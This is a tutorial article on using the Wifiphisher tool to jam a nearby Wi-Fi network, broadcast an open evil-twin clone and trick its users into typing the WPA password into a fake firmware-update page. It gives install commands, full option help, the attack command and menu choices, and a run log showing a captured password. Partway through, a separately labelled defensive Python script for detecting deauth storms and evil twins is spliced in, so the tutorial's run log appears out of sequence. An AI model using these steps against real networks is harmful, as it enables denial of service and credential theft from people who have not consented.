While cracking passwords and WPS setup attacks attract a lot of attention, social engineering attacks are by far the quickest way to get a Wi-Fi password. Wifiphisher is one of the most powerful Wi-Fi social engineering attacks, a tool that blocks the Internet until desperate users enter the Wi-Fi password to allow a fake router firmware update.
Social engineering attacks are powerful because they often bypass security entirely. If you can trick an employee into typing a password into a fake login page, it does not matter how strong the password is. This is the opposite of attacks where you use the computer's processing power to try a huge list of passwords incredibly quickly. Because of the way brute-force attacks work, they cannot succeed if the password you are attacking is strong and is not in your password list.
If you do not know how strong the target password is, a brute-force attack can be frustrating: the time and processing power it consumes can feel like a huge waste of resources when it comes up empty. Instead, tools like Wifiphisher ask questions about the people behind these networks. Does the average user know what the login page of their wireless router looks like? Would they notice if it looked different? More importantly, would a busy user who has been cut off from the Internet and is stressed still enter the password to apply a fake update, even if they notice that the login page looks a little different?
Wifiphisher bets that the answer is "Yes." To test this theory, the tool can select a nearby Wi-Fi network, de-authenticate all of its users (jamming), and create a clone access point that does not require a password. Anyone who joins the evil twin network is shown a convincing-looking phishing page that demands the Wi-Fi password to apply a firmware update, which is presented as the reason the Wi-Fi has stopped working.
From the target's point of view, the first signs of a Wifiphisher attack look like a problem with the router. First the Wi-Fi drops. They can still see the network, but every connection attempt fails immediately. Other devices cannot connect either, and they realize that not just one device but every wireless device has lost its connection to the network.
They then notice a new network with the same name as the old one but no password required. After a few more failed attempts to connect to the protected network, they join the open network, puzzled that their router is suddenly broadcasting a network without a password that anyone can join. As soon as they connect, an official-looking page opens in the router manufacturer's branding, informing them that the router is undergoing an important firmware upgrade and that the Internet will not work until they enter the password to apply the update.
After they enter their highly secure Wi-Fi password, a loading bar crawls across the screen while the router supposedly restarts, and they feel a little proud of having kept their router secure by installing this important update. After a minute's wait, their devices reconnect to the network, now, they assume, more secure thanks to the installed update.
For a hacker, retrieving passwords is as simple as choosing the network to target. As soon as a target is set, Wifiphisher immediately jams every device connected to that network. This increases the likelihood that a person on the network will become frustrated and apply the fake update. Next, the target network's information is cloned and the spoofed Wi-Fi network is broadcast, so the target believes the router is stuck in an indefinite update mode.
Devices that connect are immediately logged to a list of connected targets, and the phishing page is tailored to the router's manufacturer by reading the first part (the OUI) of the router's MAC address. Once Wifiphisher persuades one of the targets connected to the rogue network to enter the password, it notifies the hacker while the jamming continues. After submitting the captured password, the target is cruelly kept busy with a fake update loading screen and a bogus reboot timer, giving the hacker time to test the captured password.
For this attack to work, you need a Kali Linux-compatible wireless adapter. If you are not sure which one to choose, read one of our guides on picking an adapter that supports monitor mode and packet injection.
Apart from a good wireless adapter, you need a computer running Kali Linux. You should update it first by running apt update and apt upgrade. Failing to do so will likely cause problems during the Wifiphisher installation that follows.
To start, open a terminal window and type apt install wifiphisher to install Wifiphisher.
apt install wifiphisher

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer needed:
  guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0 libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160 libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16 liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7 libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26 libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24 libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21 libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9 libradare2-3.0 libsane-extras libsane-extras-common libtbb2 libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql python-anyjson python-capstone python-couchdbkit python-http-parser python-jwt python-libemu python-pam python-restkit python-socketpool x11proto-dri2-dev x11proto-gl-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
  python-pyric-doc
The following NEW packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd wifiphisher
0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded.
Need to get 4,579 kB of archives.
After this operation, 10.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B]
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB]
Fetched 4,579 kB in 10s (458 kB/s)
Selecting previously unselected package python-pbkdf2.
(Reading database ... 431969 files and directories currently installed.)
Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ...
Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Selecting previously unselected package python-pyric.
Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ...
Unpacking python-pyric (0.1.6-0kali1) ...
Selecting previously unselected package python-roguehostapd.
Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpacking python-roguehostapd (1.2.3-0kali2) ...
Selecting previously unselected package wifiphisher.
Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ...
Unpacking wifiphisher (1.4+git20180525-0kali2) ...
Setting up python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Setting up python-pyric (0.1.6-0kali1) ...
Setting up wifiphisher (1.4+git20180525-0kali2) ...
Progress: [ 95%] [#######################################################...]
If you want to try installing through the GitHub repo, you can do so by cloning the repository and following the instructions on the GitHub page:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
This should install Wifiphisher, which you can start by entering the program name in a terminal window.
You should be able to run the script at any time simply by typing sudo wifiphisher in a terminal window. While Wifiphisher does not have a man page, its --help output shows a pretty impressive list of configuration options that you can change by adding different flags to the command.
usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE] [-aI APINTERFACE] [-iI INTERNETINTERFACE] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Manually choose an interface that supports both AP and monitor modes for spawning the rogue AP as well as mounting additional Wi-Fi attacks from extensions (i.e. deauth). Example: -i wlan1
  -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
                        Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -eI wlan1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Manually choose an interface that supports AP mode for spawning the rogue AP. Example: -aI wlan0
  -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
                        Choose an interface that is connected to the Internet. Example: -iI ppp0
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Specify the MAC address of the AP interface
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Specify the MAC address of the extensions interface
  -iNM, --no-mac-randomization
                        Do not change any MAC address
  -kN, --keepnetworkmanager
                        Do not kill NetworkManager
  -nE, --noextensions   Do not load any extensions.
  -nD, --nodeauth       Skip the deauthentication phase.
  -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
                        Channels to deauth. Example: --deauth-channels 1,3,7
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point. This option skips the access point selection phase. Example: --essid 'Free WiFi'
  -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
                        Deauth all the BSSIDs in the WLAN with that ESSID.
  -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Choose the phishing scenario to run. This option skips the scenario selection phase. Example: -p firmware_upgrade
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue access point. Example: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Capture of the WPA/WPA2 handshakes for verifying the passphrase. Example: -hC capture.pcap
  -qS, --quitonsuccess  Stop the script after successfully retrieving one pair of credentials
  -lC, --lure10-capture
                        Capture the BSSIDs of the APs that are discovered during the AP selection phase. This option is part of the Lure10 attack.
  -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
                        Fool the Windows Location Service of nearby Windows users into believing it is within an area that was previously captured with --lure10-capture. Part of the Lure10 attack.
  --logging             Log activity to file
  -dK, --disable-karma  Disables the KARMA attack
  -lP LOGPATH, --logpath LOGPATH
                        Determine the full path of the logfile.
  -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
                        Determine the full path of the file that will store any captured credentials
  --payload-path PAYLOAD_PATH
                        Payload path for scenarios serving a payload
  -cM, --channel-monitor
                        Monitor if the target access point changes the channel.
  -wP, --wps-pbc        Monitor if the button on a WPS-PBC Registrar is pressed.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        The WLAN interface used for associating to the WPS access point.
  -kB, --known-beacons  Broadcast a number of beacon frames advertising popular WLANs
  -fH, --force-hostapd  Force the usage of the hostapd installed in the system
  -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
                        Search for phishing pages in this location
  --dnsmasq-conf DNSMASQ_CONF
                        Determine the full path of a custom dnsmasq.conf file
  -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
                        Determine the ESSID you want to use for the phishing page
Step 3: Plug in your wireless adapter
Now is the time to prepare the wireless adapter by plugging it in. Wifiphisher will put your card into monitor mode for you if you do not do it yourself.
I will use my USB wireless network adapter, so I add the -i flag followed by the name of my network adapter to the command. Otherwise, Wifiphisher will simply pick a network adapter for you.
To start the script, I run the following command:
sudo wifiphisher -i wlan1
After that, we should see a screen listing every nearby network. We can choose which network we want to attack, then press [Enter].
Next, the script asks "Which attack do you want to execute?" Select option 2.
Once you have selected the attack, it starts immediately. It opens a screen that lists targets as they join the rogue network. Wifiphisher also watches for devices probing for networks that do not exist nearby and creates fake versions of those networks to lure the devices into connecting.
After a target has connected, a pop-up window prompts them for the password.
If the target enters the password, we are notified on the Wifiphisher screen.
That's it! The script exits and shows you the password that was just entered.
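From the defender's side, the attack described in this article (the deauthentication storm against the real access point, the open clone of a protected ESSID, and the fake networks answered for devices probing for absent ones) leaves three signatures in the air that a wireless IDS can flag. The following toy rule set, an added example and not part of the article or of Wifiphisher itself, runs those three checks over a constructed list of frame records. The Frame class, the KNOWN_APS inventory, the thresholds and the sample frames are all assumptions made for the example; a real deployment would feed it records parsed from a monitor-mode capture.

```python
"""Added example, not part of the original article: a toy wireless IDS that
flags three observable signatures of the evil-twin attack described above:
  1. a burst of deauthentication frames aimed at a protected AP,
  2. an open AP advertising a known ESSID from a BSSID we do not own,
  3. one transmitter answering for many unrelated ESSIDs (the KARMA-style
     behaviour that lures devices probing for networks that do not exist).
The Frame records and the KNOWN_APS inventory are constructed sample data."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    t: float              # capture time in seconds (constructed)
    kind: str             # "beacon", "probe_resp" or "deauth"
    bssid: str            # transmitter address (for deauth: the AP being spoofed)
    essid: str = ""       # ESSID carried by a beacon / probe response
    privacy: bool = True  # Privacy bit: True = WPA/WPA2/WEP, False = open


# Defender-maintained inventory: ESSID -> legitimate BSSIDs (constructed).
KNOWN_APS = {"HomeNet": {"a4:2b:8c:11:22:33"}}

DEAUTH_THRESHOLD = 20      # deauth frames inside WINDOW seconds count as a storm
WINDOW = 5.0
MAX_ESSIDS_PER_BSSID = 3   # a real AP advertises one or a few ESSIDs


def deauth_storms(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW):
    """BSSIDs that saw >= threshold deauth frames within any sliding window."""
    per_bssid = defaultdict(list)
    for f in frames:
        if f.kind == "deauth":
            per_bssid[f.bssid].append(f.t)
    flagged = set()
    for bssid, times in per_bssid.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:   # slide the window start forward
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged.add(bssid)
                break
    return flagged


def evil_twins(frames, known=KNOWN_APS):
    """(essid, bssid) pairs of open APs reusing a known ESSID from an unknown BSSID."""
    twins = set()
    for f in frames:
        if (f.kind in ("beacon", "probe_resp") and f.essid in known
                and f.bssid not in known[f.essid] and not f.privacy):
            twins.add((f.essid, f.bssid))
    return twins


def karma_suspects(frames, limit=MAX_ESSIDS_PER_BSSID):
    """{bssid: sorted essids} for transmitters advertising more than `limit` ESSIDs."""
    seen = defaultdict(set)
    for f in frames:
        if f.kind in ("beacon", "probe_resp") and f.essid:
            seen[f.bssid].add(f.essid)
    return {b: sorted(e) for b, e in seen.items() if len(e) > limit}


def analyse(frames):
    """Return one alert string per finding, in a stable order."""
    storms = deauth_storms(frames)
    alerts = [f"DEAUTH_STORM target={b}" for b in sorted(storms)]
    for essid, b in sorted(evil_twins(frames)):
        # An open twin that appears while its real AP is being deauthed is the
        # strongest indicator, so mark that correlation explicitly.
        note = " after_deauth_storm" if KNOWN_APS.get(essid, set()) & storms else ""
        alerts.append(f"OPEN_EVIL_TWIN essid={essid} rogue_bssid={b}{note}")
    for b, essids in sorted(karma_suspects(frames).items()):
        alerts.append(f"KARMA_SUSPECT bssid={b} essids={','.join(essids)}")
    return alerts


# Constructed sample: 25 spoofed deauths at the real AP over 2.4 s, then a
# rogue BSSID beacons an open "HomeNet" and answers probes for three more SSIDs.
ROGUE = "00:00:00:31:8c:e5"
SAMPLE = (
    [Frame(0.1 * i, "deauth", "a4:2b:8c:11:22:33") for i in range(25)]
    + [Frame(3.0, "beacon", "a4:2b:8c:11:22:33", "HomeNet", True),
       Frame(3.5, "beacon", ROGUE, "HomeNet", False),
       Frame(3.6, "probe_resp", ROGUE, "CoffeeShop_Free", False),
       Frame(3.7, "probe_resp", ROGUE, "attwifi", False),
       Frame(3.8, "probe_resp", ROGUE, "Airport_WiFi", False)]
)

if __name__ == "__main__":
    for line in analyse(SAMPLE):
        print(line)
```

The thresholds are deliberately conservative: a legitimate AP may send a few deauths when it reboots or kicks an idle client, and a multi-SSID enterprise AP legitimately advertises several ESSIDs, so tune DEAUTH_THRESHOLD and MAX_ESSIDS_PER_BSSID against a baseline of your own environment before alerting on them. The correlation in analyse (an open twin appearing while its real AP is under a deauth storm) is what separates this attack pattern from a neighbour who simply picked the same network name.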
[*] Starting Wifiphisher 1.4GIT (https://wifiphisher.org) at 2019-02-04 08:10
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5
[!] Couldn't set MAC address. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials: wfphshr-wpa-password=mypassword
[!] Closing
You've bypassed password security and tricked a user into entering the Wi-Fi password into your fake network. Worse, they're still stuck behind that dreadful, slow-moving, fake loading screen.
If you're looking for a cheap, handy platform for getting started with Wifiphisher, take a look at our Kali Linux Raspberry Pi build on the $35 Raspberry Pi.